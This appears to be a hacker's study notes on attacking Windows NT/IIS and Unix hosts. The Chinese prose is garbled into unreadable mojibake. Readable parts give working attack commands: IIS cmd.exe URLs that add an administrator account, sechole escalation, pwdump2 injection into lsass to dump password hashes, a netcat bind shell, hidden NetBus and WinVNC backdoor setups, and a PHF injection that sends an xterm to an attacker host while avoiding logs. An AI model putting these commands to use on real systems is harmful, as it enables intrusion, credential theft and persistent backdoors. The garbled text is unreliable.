ÁÙ¦b¥Î¤ì°¨µ¥³½¨à¤W¤Ä,µM«á¥Îprot±½ºË,©Î°½¿sicpº|¬},©Î¬O²q±K½X,©Î©ñ©Î±H¯f¬rºô¶
µ¥¤H¥´¶}¨Ó³o¨Çªìµ¥©Î¤¤µ¥ªº§ðÀ»ªk¶Ü??¬ü°êÀb«Èªº¹ê¤O¯u¬O¥t¤HµLªk·Q¹³,
¥LÌ¥u»Ý§Q¥Îºô§}´N¯à»´¦Ó·NÁ|ªº¥D°Ê§ðÀ»¤F,±¡µ²¤£¿éµ¹¹q¼v,§Ú̪º¤âªk
¹ï¥L̦Ө¥¥u¬OµL¶·¤jÅå¤p©Çªº¤p¨à¬ì......°Ñ¦Ò®Ñ¬°¶Â¬õ¦âªººô¸ôÀb«È»P¨t²Î¦w¥þ
(¦n¹³¦³·sª©ªº,¤p¬Ó¬Oª©ªº,¦WºÙ»P¥~Ãö®t¤£¦h)
®ÑÄy¤Wªº«ÂI,§@ªÌ¬O¬ü°êµÛ¦Wªººô¸ô¦w¥þ±M®a,
»·ºÝ½w½Ä°Ï·¸º¡{buffer overflow}
½w½Ä°Ï·¸º¡¬Oµo¥Í¦bµ{¦¡¨S¦³¾A·íªºÀˬd¿é¤J¤º®eªºªø«×
,¦Ó¾ÉP½w½Ä°ÏªÅ¶¡¤£¨¬,¦]¦¹,¥ô¦ó¹w´Á¤§¥~ªº¿é¤J,´N·|
±»»\±¼CPU°õ¦æ°ïÅ|ªº¨ä¥¦³¡¤À.
»·ºÝ°õ¦æ©R¥O¨ú±o¨t²ÎºÞ²zªÌÅv
http://www.infowar.co.uk/mnemonix
»·ºÝ°õ¦æ¤@ӧ妸Àɰõ¦æ¥ô·Nªºµ{¦¡
http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm
ISSHACK http://www.eeye.com
¦bNT ISSºô¶¦øªA¾¹¤W°õ¦æµ{¦¡½X
¦b¥»¾÷¤¤¥i¥Hµ¹¨Ï¤@¦ì¨Ï¥ÎªÌ¥[¤J¨ì°Ï°ìªººÞ²zªÌ¸s²Õ¤¤ªºÂXÅvµ{¦¡
http://www.ntsecurity.net/security/getadmin.htm
¦³¬Û¦ü¥\¯àªº¨ä¥¦µ{¦¡ sechole¤É¯Åª©¬Osecholed
http://www.ntsecurity.net/security/sechole.htm
(Domain Admin group) ºô°ìºÞ²zªÌ(¤É¯Å)¸s²Õ
cmd.exe NT©R¥O¸ÑÄÀ¾¹
ntuser µ{¦¡ ¥Î¨Ó×§ï¨Ï¥ÎªÌ,¸s²Õ©M¬Fµ¦ªºµ{¦¡,¥i°Ñ¦Ò
http://www.pedestalsoftware.com
Secholeªº±Ò°Ê¥i¾a¦b¤@ÓÂsÄý¾¹¿é¤J¤@Ó¾A·íªºURL³sºô¥Ø¼Ð¨t²Î,¨Ò¦p¤U¦C
§Ú̱NSechole¤W¶Ç¦Ü/W3SVC/1/ROOT/SCRIPTS
(³o¸Ì´N¬OC:\inetpub\SCRIPTS)
µM«á¥Î¤U±ªºURLºô§}±Ò°Ê¥¦
http://192.168.202.154/scripts/secholle.exe
³o¼Ë°µ·|¦¨¥\ªº±NIUSR_machine_name±b¸¹¥[¤JºÞ²zªÌ¸s²Õ¤¤,§Ų́èS¦³
IUSRªº±K½X,¦]¦¹§Ú̬°¤FnÁ×§Kµn¤JIUSR,³q±`¬O¦b¥Ø¼Ð¨t²Î¤W¶}Ó±b¸¹,
°µªk¬O§Q¥Întuser¤½¥Îµ{¦¡³z¹LÂsÄý¾¹°õ¦æ¤U¦C½ÆÂøªºURL(¬°¤F¤è«K¾\Ū¤º®e¸g¹L¸Ë¹¢)
http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret
¥H¤W%20¦Aºô»y¤¤¬OªÅ¥Õªº·N«ä,©Ò¥H¥H¤Wºô§}·|³Q°õ¦æ¬°
(cmd /c ·|°e¥Xntuser©R¥O¨ìshell,¦b§¹¦¨®É²×µ²¦Û¤v)
cmd /c ntuser -s <servername> add <username> -password
<password>
¥H¤W§Ú̬O¥Hcorpl°µ¦øªA¾÷¦WºÙ,mallory¬O¨Ï¥ÎªÌ¦WºÙ,secret·í±K½X,
¥ÎÃþ¦üªºURL§ðÀ»ªÌ¥i¥H¥ÎntuserÀ°§A§âmallory¥[¨ìºÞ²zªÌ¸s²Õ¸Ì,¦p¤U
(LORGUP¬O«ü¬YӰϰì¸s²Õ)
cmd /c ntuser -s <servername> LORGUP APPEND
<groupname> <username>...
http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory
¦P¾÷¯àªº§å¦¸Àɼgªk¦pregistry,cmd
¤º®e: net localgroup administrators <USER> /add
¦w¥þ¨t²ÎISS¥Ø¿ý©M¤@¨Ç¼ç¦b¥i¦æªº¥Ø¿ý
http://www.iss.net/xforce/alerts/advise6.html
¥H¤U/W3SVC/1/ROOT³q±`¬O«üC:\Inetpub\ÁÙ¦³News¤ÎMail
/W3SVC/1/ROOT/msade
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/ISSADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
(_vti_bin³£¬O¦w¸ËFront Page¤§«ál¥Í¥X¨Óªº)
©ñ§å¦¸Àɪº¦a¤è
HKLM\software\Microsoft\CurrentVersion
\RUN [any]
\AeDebug Debugger
\WinLogon Userinit
------------------------------------------------------------
°õ¦æNTªºNT Repair Disk Utility (rdisk)
·|¦b%SYSTEMROOT%\repair
¤¤²£¥Í¤@ÓÀ£ÁY¹LªºSAMÀÉ¥sSAM._ ,ÁÙìªk: C:\>expand
SAM._ SAM
NTFDOS:NTFSÅX°Ê³nÅéhttp://www.sysinternals.com
¥i¯}SYSKEYªº¬OPwdump2
http://www.webspan.net/~tas/pwdump2
¥¦¥i¨Ï¥ÎDLLª`¤Jªº¤èªk±N¦Û¤vªºµ{¦¡½X´¡¤J¨ä¥¦¨ã¦³§ó°ªÅvªº¦æµ{¤¤,
¤@¦ýª`¤J§ó°ªÅvªº¦æµ{¤§«á,³o¨Ç´c½èªº°õ¦æ½X´N¥i¥H¦Û¥Ñªº¤º³¡©I¥sAPI,
¨Ó¦s¨úSYSKEY¥[±Kªº±K½X¦Ó¤£»Ý±N¨ä¸Ñ±K.
pwdump2©ÒºË·Çªº°ªÅv¦æµ{¬Olsass.exe,¥¦¬O°Ï°ì¦w¥þ±ÂÅv¤l¨t²Î,
Pwd2¬O±N¦Û¤vª`¤J¨ìlsassªº¦ì§}ªÅ¶¡¤¤,¦]¦¹¦b°õ¦æPwdump2¤§«e¥²»Ý°Ê¤â
§ä¥Xlsass.exeªº¦æµ{Ã丹(PID),¥H¤U¬O¥ÎNTRKùتºpulist¤½¥Îµ{¦¡¨Ã±N
¿é¥X¾É¦Vfind§ä¥Xlsass.exeªºPID¬°50
(¥H¤UC:\¥Nªí¥»¾÷,D:\¥Nªí»·ºÝ¥D¾÷)
D:\>pulist | find "lsass"
lsass.exe 50 NT AUTHORITY\SYSTEM
²{¦bPwdump2¥i¥H¨Ï¥ÎPID 50¨Ó°õ¦æ¤F,¹w³]¤U·|±N¥¦ªº¿é¥X
Åã¥Ü¦b¼ü¼}¤W,¥i¥H«Ü®e·Nªº¾É¦V¤@ÓÀÉ®×
D:\>pwdump2 50
ASCIIµLªkÅã¥Üªº¦r¤¸Num Lock)ALT-255©ÎALT-129
¥ÎAT°õ¦æ»·ºÝ±Æµ{ (Âù¤Þ¸¹)
C:\>at \\192.168.202.44 10:40P""remote /s cmd secret""
¥h°£¥i¥Î"[job id] /delete"
»·ºÝ¬d®É¶¡c:>\sc \\192.168.202.44 start schedule
sc.exe¬O¥i±Ò°Ê±Æµ{ªA°È C:>\net time \\192.168.202.44
¥H¤UD:\¥Nªí¥»¾÷C:\¥Nªí»·ºÝ
D:\>remote /c 192.168.202.44
secret
C:\>Dir winnt\repair\Sam._
C:\>@Q (µ²§ô¥Î¤áºÝ)
C:>\@k (µ²§ô¦øªAºÝ)
¦ýremote¤£¥i±Ò°Ê»{¦ó¥Î¨ìWin32 console APIªºµ{¦¡
remote.exe /C¬°¥Î¤áºÝ /S¬°¦øªA¼Ò¦¡
»·ºÝºÊµø§ì¨ú¿Ã¹õhttp://www.uk.research.att.com/vnc
-----------------------------
Netcat
¥H¤U¬O¨Ï¥Îcommand¨Ó²âÅ¥
-L ¤£·|°±¤î
-d ·t¤¤¶i¦æ,¤£·|¦³¤á°Êªº¥D±±¥x
-e ¬O«ü©w±Ò°ÊNT©R¥Oªº¸ÑÄÀ¾¹,
»·ºÝ¬°C:\TEMP\NC11NT
-p ¬O«ü©w²âÅ¥ªº³q°Tªú
C:\TEMP\NT11NT>nc -L -d -e cmd.exe -p 8080
¨Ò C:\TEMP\NT11NT>nc 192.168.202.44 8080
D:\temp\regini -m \\192.168.202.44 netbus.txt
NTRK¤¤ªºregini.exe¥i¥Hª½±µ§â¥²nªº¶µ¥Ø¥[¤J¨ì»·ºÝªºRegistry¤º
REGINIŪ¨ú¤å¦rÀÉ·í°µ¿é¤J¨Ó¶i¦æRegistryªº×§ï,©Ò¥H§ÚÌ¥²»Ý«Ø¥ß¤@Ó
Netbus.txtªºÀÉ®×¥X¨Ó
D:\temp\regini -m \\192.168.202.44 netbus.txt
ªºÀɮפº®e¦p¤U !!!¸Ô²Ó½Ð¨ì®Ñ§½¬d¾\,¤£ª¾¦³¨S¦³§Û¥¿«o!!!
HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus
Server\Genera
Accept=1
TCPPort=80
Visibility=3 ¦bÁôÂüҦ¡¤U°õ¦æ
AccessMode=2
AutoStart=1 ¦bwindows±Ò°Ê®É°õ¦æ
HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus
Server\Protection
password=impossible
WinVNCªº¥Îªk²Ä¤@³¡±N¥²nÀɽƻs¨ì¥Ø¼Ð¨t²Î(winVNC.exe,VNCHooks.dll,OMNI
THREAD_RT.DLL)
2.³]©w¨Ï¥Î¦¹µ{¦¡ªº±K½X,«Ø¤@Ó¥sWINVNC.INIªºÀɮפº®e¦p¤U
!!!¸Ô²Ó½Ð¨ì®Ñ§½¬d¾\,¤£ª¾¦³¨S¦³§Û¥¿«o!!!
HKEY_USER\.DEFAULT\software\ORL\WinVNC3
SocketConnect=REG_DWORD
0x00000001
password=REG_BINARY 0x00000008
µM«á¨Ï¥Îregini±N³o¨Çȸü¤J¨ì»·ºÝRegistry¤º
C:\>regini -m \\192.168.202.33 winvnc.ini
NTRKªºregdmp¤½¥Îµ{¦¡¬O¥i§âRegistryÂà¿ý¤U¨Ó
³Ì«á±NwinVNC¦w¸Ë°_¨Ó¦¨¬°¦øªAµ{¦¡¨Ã±Ò°Ê¥¦,¤U¦Cªº»·ºÝ©R¥O,(°O±o³o¬O»·ºÝ©R¥O)
C:\>WinVNC -install
C:\>net start winvnc
²{¦b§Úªù´N¥i¥H±Ò°Êvncviewerµ{¦¡¨Ã©M§Ú̪º¥Ø¼Ð³s½u,
¤U¹Ï¬O³]©w³s½u¨ì"Åã¥Ü0"IPªº¦ì¸m,¤U¤@¨B¬O±K½X
___________________________________________
| vncSERVER |192.168.202.33.0 |v|
===========================================
«ÝÄò.....
ºI¨ú×§ï±K½Xhttp://www.ntsecurity.net/security/passworddll.html
¤U¨Ò¬O¥iª½±µÅã¥Üì©l½X,Netscape¬O¦sÀÉ
http://www.Company.com/scripts/files.asp::$DATE
APSÀɫᱦh¥[¥yÂI´N¦³¾÷·|¬Ý¨£ì©lÀÉ,©Î¥H16¶i¦ì¨Ó¯}©j×¥¿ª©
http://www.Company.com/code/example.asp.
http://www.Company.com/code/example%2easp
--------------------------------------
¤@³¡¾÷¾¹ªºSID¬O¤@¦ê¼Æ¦r,¥HS-1¶}ÀY,¨Ã¥H§Z¾î¸¹¤À¦¨¦n´X¬q,¦Ó³Ì«á¤@¯ª
ªº¼Æ¦rºÙ¬°RID,¹ï©óNT¤º«Øªº¨Ï¥ÎªÌ»P¸s²Õ³£¦³¹w¥ý©w·NªºRID,
¨Ò¦pAdministratorªºRID½X¤@©w³£¬O500,¦ÓGUEST¬°501,Àb«È¥i¥Îsid2user¨Ó§ä¥X
¤wª¾SID©MRID¬°500¨Ó§ä¥XºÞ²zªÌªº±b¸¹¦WºÙ(¬J¨Ï§ï¹L¦WºÙ)
C:\>sid2user \\192.168.2.33 8915387 1645822062 18....5
500 (S-1©Mµu¾î¸¹¬O¬Ù²¤ªº)
http://www.chem.msu.su:8080/~rudnyi/NT/sid.txt
http://www.ntmag.com/Magazine/Article.cfm?ArtideID=3143
-----------------------------------------
³Ì¨Îªºxterm
UNIX¥i¦b¬Û®eªº¾÷¾¹¤WÅã¥ÜX Window,¤]¯à³z¹Lprot
-6063Åã¥Ü¦b»·ºÝªº
X¦øªA¾¹¤W,µM¦Ó¥[¤W-dispaly°Ñ¼Æ§ðÀ»ªÌ¥i¥H±N¥L¦Û¤vªº©R¥O¤¶±¼h¾É¦V¦Û¤v
ªºX¦øªA¾¹,¥i¥H§ï¨}ìPHF§ðÀ»¤è¦¡/cgi-bin/phf?Qalias=z%0a/bin/cat%20/etc/passwd
¬JµM§ðÀ»ªÌ¨ã¦³¦bºô¶¦øªA¾¹¤W°õ¦æ»·ºÝ©R¥Oªº¯à¤O,¥un§â³oÓ§ðÀ»µy·L×§ï¤@¤U
,´N¥i¥HÀò¨ú¥æ½Í¦¡¤¶±¼h¦s¨ú,§ðÀ»ªÌn°µªº¬O±N©R¥O¤º®e¤¤ªº/bin/cat
/etc/passwd §ï¦¨ /usr/X11R6/bin/xterm -ut -dispaly
evil_hackers_IP:0.0 §¹¾ãªº©R¥O¦p¤U:
/cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-dispaly%20evil_hackers_IP:0.0
¤W±³oÓ¬O¦b»·ºÝªººô¶¦øªA¾¹´N·|°õ¦æxterm¨Ã¥BÅã¥Ü¦b§ðÀ»ªÌ(evil_hackers)ªºX¦øªA¾¹¤W
(µøµ¡ID=0;¿Ã¹õID=0),¦]¬°§ÚÌ¥[¤W¤F-ut°Ñ¼Æ,¦]¦¹³oӰʧ@¨Ã¤£·|³Q¨t²Î°O¿ý
¤U¨Ó,³o¼Ë§ðÀ»ªÌ¸ò¥»¤£»Ýnµn¤J¥ô¦ó¦øªAµ{¦¡´N¥i¥HÀò±o±Ð½Í¦¡¤¶±¼h¦s¨ú,
³q±`§ÚÌ·|¨Ï¥Îxtermªº§¹¾ã¸ô®|,¦]¬°§Ú̧ðÀ»®i¶}®É,¨äPATHÀô¹Ò°Ñ¼Æ¤£¤@©w³]©w
²Å¦X§Ú̪º»Ý¨D,¨Ï¥Î§¹¾ã¸ô®|¤~¯à«o«Oºô¶¦øªA¾¹¥i¥H¶¶§Q§ä¨ìxterm°õ¦æÀÉ
===================================================
port service
7 echo
9 discard
13 daytime
19 Chargen
21 ftp
22 ssh
23 telnet
25 smtp
25 smap
37 time
53 dns
79 finger
80 http
110 pop3
111 sunrpc
139 netbois
143 imap
443 https
512 exec
513 login
514 shell
2049 nfs
4045 lockd
31337 UDP (BO)
12345 TCP (NetBus)
1394 DVD
31337 unassigned
12345 unassigned
135-139 UPD©MTCP/IP
LINUX¥Îºô¸ôµ²ºc±´°É¤u¨ãhttp://www.marko.net/cheops
¶W¯Å§ì¯¸³nÅéhttp://www.blighty.com/products/spadeªºSam
SpadeÁÙ¦³Crawl,Website
¬ªº|Àɮפº®e,¥un§ðÀ»ªÌª¾¹DÀɮצì¸m¨Ã¥H«D¼Ð·ÇªºURL°e¥Xn¨D....
¸Ôhttp://www.microsoft.com/security/bulletins/ms99-010.asp
ºô¸ô007 http://www.samspade.org/
§@¸¨t²Î±´ª¾¾¹Queso http://www.apostols.org/projectz/
ºô¸ô·½¥Ñµ²ºc¹Ïhttp://www.visualroute.comªºVisualRoute
ºô¸ôµ²ºc±´¯Á¤u¨ãhttp://www.marko.net/cheops
http://www.home.cs.utwente.ht/schoenw/scottyªºTkined쥻¬OScotty¨ç¦¡®wªº¤@³¡¥÷
Nnmapªº§ó·s¤u¨ãhttp://www.insecure.org:80/cgi-bin/nmap-submit.cgi
http://www.remotelyanywhere.comºô¶NTºÞ²z¤u¨ãRemotely
Anywhere
2.Remotely Possible / Control IT
http://www.cai.comªºControl
IT¥i¦bWindows,Linux,Solaris¤W¥Î
http://www.uk.research.att.com/Vnc
queue³B²z¾¹ªº¦î¦C
dual-homed¨â´Ï¥D¾÷
HTML´«¦æ½X%0a
HTMLªÅ®æ½X%20
VirtualµêÀÀ
Privateµ·¤H
back channel¦^¶Ç³q¹D
,©w·N:¤@Ó³q°TºÞ¹D°_©lºÝ¬°¥Ø¼Ð¨t²Î¦Ó«D§ðÀ»ºÝ
shared library¦@¨É¨ç¦¡®w
signal«H¸¹
aliase¤Æ¦W
|